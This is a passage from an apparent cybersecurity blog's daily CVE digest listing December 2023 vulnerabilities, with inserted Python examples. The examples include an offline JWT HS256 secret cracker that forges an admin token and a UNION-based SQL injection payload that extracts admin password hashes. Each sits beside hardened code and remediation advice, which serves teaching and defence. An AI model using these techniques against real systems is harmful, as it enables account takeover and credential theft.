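HARDENED_RESPONSE = "<p>Adults: &lt;zx9q&gt;</p>"


if __name__ == "__main__":
    for p in PARAMS:
        print(build_probe_url(p))
    print(triage({"adults": VULNERABLE_RESPONSE, "children": HARDENED_RESPONSE}))
```

In PHP the fix for each echo is output encoding at the point of use, for example htmlspecialchars($value, ENT_QUOTES, 'UTF-8'); the "encoded" class is what that produces. The check only covers the between-tags context the advisory names; a value reflected inside an attribute value or a script block needs context-specific encoding and a different canary.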


Source : progress.com

Vulnerability ID : CVE-2023-6784

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
A malicious user could potentially use the Sitefinity system for the distribution of phishing emails.

CVE ID : CVE-2023-6784
Source : security@progress.com
CVSS Score : 4.7

References :
https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerability-CVE-2023-6784-December-2023 | source : security@progress.com
https://www.progress.com/sitefinity-cms | source : security@progress.com

Vulnerability : CWE-20


(1) LOW VULNERABILITIES [0.1, 3.9]

Source : patchstack.com

Vulnerability ID : CVE-2023-46311

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments – wpDiscuz. This issue affects Comments – wpDiscuz: from n/a through 7.6.3.

CVE ID : CVE-2023-46311
Source : audit@patchstack.com
CVSS Score : 2.7

References :
https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


(17) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : mitre.org

Vulnerability ID : CVE-2023-45887

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client's machine via a modified GPCM message.

CVE ID : CVE-2023-45887
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/MikeIsAStar/DS-Wireless-Communication-Remote-Code-Execution | source : cve@mitre.org
https://pastebin.com/ukRzztv0 | source : cve@mitre.org


Vulnerability ID : CVE-2023-27172

First published on : 20-12-2023 01:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Xpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a brute-force attack.

CVE ID : CVE-2023-27172
Source : cve@mitre.org
CVSS Score : /

References :
https://balwurk.github.io/CVE-2023-27172/ | source : cve@mitre.org

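The Write-back Manager entry above is about the HMAC-based JWT algorithms (HS256 and friends), where the signing key is a shared secret: anyone who guesses it can mint tokens for any user. The block below is an added example of that attack class in generic JWT code; it is not Xpand IT's implementation and not the script from the referenced write-up. The claims, the weak secret and the wordlist are constructed; a real attack uses a large password list and the captured token.

```python
# Added example: offline dictionary attack on an HS256 JWT secret, then forging
# a token with the recovered secret. Generic code, not Write-back Manager's.
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint an HS256 JWT. Used here to build constructed sample tokens and to
    forge one once the secret is known."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def crack_hs256_secret(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Re-sign the token's header.payload with each candidate secret and compare
    against the real signature. No interaction with the server is needed, so
    rate limiting does not help; only key strength does."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token: alg={header.get('alg')!r}")
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    target = _b64url_decode(sig_b64)
    for candidate in candidates:
        guess = hmac.new(candidate, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def forge_with_secret(secret: bytes, claims: dict) -> str:
    """What the attacker does after recovery: issue a token with chosen claims."""
    return sign_hs256(claims, secret)


# Constructed wordlist; real attacks use lists with millions of entries.
WORDLIST = [b"password", b"123456", b"secret", b"changeme", b"jwtsecret"]


def demo() -> tuple:
    """Weak secret is recovered; a 32-byte random secret (the RFC 7518 minimum
    for HS256) is not in any wordlist and survives."""
    weak_token = sign_hs256({"sub": "alice", "role": "user"}, b"secret")
    strong_token = sign_hs256({"sub": "alice", "role": "user"}, secrets.token_bytes(32))
    return crack_hs256_secret(weak_token, WORDLIST), crack_hs256_secret(strong_token, WORDLIST)


if __name__ == "__main__":
    recovered, not_recovered = demo()
    print("weak secret recovered:", recovered, "| strong secret:", not_recovered)
    if recovered:
        print("forged admin token:", forge_with_secret(recovered, {"sub": "alice", "role": "admin"}))
```

The remediation side is the last line of demo(): generate the HS256 secret from a CSPRNG with at least 32 bytes (RFC 7518 requires a key at least as long as the hash output), store it outside the code base, and rotate it if a dump of the application is ever exposed.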

Vulnerability ID : CVE-2023-50044

First published on : 20-12-2023 09:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Buffer Overflow vulnerability in Cesanta MJS version 2.22.0 allows attackers to execute arbitrary code, cause a denial of service (DoS), or obtain sensitive information: a segmentation fault can occur in getprop_builtin_foreign when the input string includes the name of a built-in API.

CVE ID : CVE-2023-50044
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/cesanta/mjs/issues/254 | source : cve@mitre.org
https://github.com/cesanta/mjs/pull/255 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50628

First published on : 20-12-2023 09:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Buffer Overflow vulnerability in libming version 0.4.8 allows attackers to execute arbitrary code and obtain sensitive information via the parser.c component.

CVE ID : CVE-2023-50628
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/libming/libming/issues/289 | source : cve@mitre.org
https://github.com/libming/libming/pull/290 | source : cve@mitre.org


Vulnerability ID : CVE-2023-47990

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
SQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter.

CVE ID : CVE-2023-47990
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/d3do-23/cuppacve/blob/main/sql%20in%20edit_admin_table.php | source : cve@mitre.org

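The CuppaCMS entry above is a table-identifier injection: the `table` parameter names which table edit_admin_table.php operates on, and a name cannot be bound as a query parameter, so concatenation is the obvious but wrong implementation. The block below is an added example of that pattern on SQLite, not CuppaCMS code; the schema, the rows and the allowlist of editable tables are constructed for illustration.

```python
# Added example: SQL identifier injection through a "table" request parameter,
# the vulnerable pattern beside the allowlisted one. Not CuppaCMS code.
import sqlite3

# Constructed schema standing in for a CMS database.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT);
        CREATE TABLE admin_users (id INTEGER, login TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'room-deluxe');
        INSERT INTO admin_users VALUES (1, 'admin', '$2y$10$constructedhash');
    """)
    return conn


def edit_table_vulnerable(conn: sqlite3.Connection, table: str) -> list:
    """The reported defect: the identifier from the request is concatenated
    verbatim, so the parameter becomes arbitrary SQL after FROM."""
    return conn.execute(f"SELECT * FROM {table}").fetchall()


# Assumed allowlist: the tables an editor is meant to open through this page.
EDITABLE_TABLES = {"products"}


def edit_table_hardened(conn: sqlite3.Connection, table: str) -> list:
    """Identifiers cannot be bound, so validate against an allowlist, then quote
    the (now trusted) name so it can never be parsed as anything but a name."""
    if table not in EDITABLE_TABLES:
        raise ValueError(f"table {table!r} is not editable")
    quoted = '"' + table.replace('"', '""') + '"'
    return conn.execute(f"SELECT * FROM {quoted}").fetchall()


def placeholder_cannot_bind_identifier(conn: sqlite3.Connection) -> bool:
    """Why the allowlist is needed: a bound parameter is a value, not an
    identifier, so 'SELECT * FROM ?' is a syntax error, not a fix."""
    try:
        conn.execute("SELECT * FROM ?", ("products",))
    except sqlite3.OperationalError:
        return True
    return False


# Attacker-controlled value for the table parameter: the first SELECT is
# neutralised with WHERE 0 and a UNION pulls credentials from another table.
ATTACK_TABLE = "products WHERE 0 UNION SELECT login, password_hash FROM admin_users"


def steal_admin_hashes(conn: sqlite3.Connection) -> list:
    return edit_table_vulnerable(conn, ATTACK_TABLE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", steal_admin_hashes(db))
    print("hardened, allowed:", edit_table_hardened(db, "products"))
    print("placeholder rejected by parser:", placeholder_cannot_bind_identifier(db))
    try:
        edit_table_hardened(db, ATTACK_TABLE)
    except ValueError as exc:
        print("hardened, attack:", exc)
```

The same rule applies to column names, ORDER BY targets and any other identifier taken from a request: map the user's choice onto a fixed set of known names and never splice the raw string into the statement, whichever database driver is in use.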

Vulnerability ID : CVE-2023-50639

First published on : 20-12-2023 21:15:08
Last modified on : 20-12-2023 21:15:08

Description :
Cross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page.

CVE ID : CVE-2023-50639
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/940198871/Vulnerability-details/blob/main/CVE-2023-50639.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50983

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function.

CVE ID : CVE-2023-50983
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysScheduleRebootSet-2.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50984

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function.

CVE ID : CVE-2023-50984
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/spdtstConfigAndStart.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50985

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function.

CVE ID : CVE-2023-50985
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/lanCfgSet.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50986

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function.

CVE ID : CVE-2023-50986
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysLogin.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50987

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function.

CVE ID : CVE-2023-50987
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysTimeInfoSet.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50988

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function.

CVE ID : CVE-2023-50988
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/wifiRadioSetIndoor.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50989

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function.

CVE ID : CVE-2023-50989
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/pingSet-2.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50990

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function.

CVE ID : CVE-2023-50990
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysScheduleRebootSet.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50992

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function.

CVE ID : CVE-2023-50992
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/setPing.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50993

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 were discovered to contain a command injection vulnerability via the function downFiles.

CVE ID : CVE-2023-50993
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/ef4tless/vuln/blob/master/iot/WS6008-WS6108/1.md | source : cve@mitre.org


Source : google.com

Vulnerability ID : CVE-2023-3742

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Insufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High)

CVE ID : CVE-2023-3742
Source : chrome-cve-admin@google.com
CVSS Score : /

References :
https://bugs.chromium.org/p/chromium/issues/detail?id=1443292 | source : chrome-cve-admin@google.com
https://crbug.com/1443292 | source : chrome-cve-admin@google.com


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports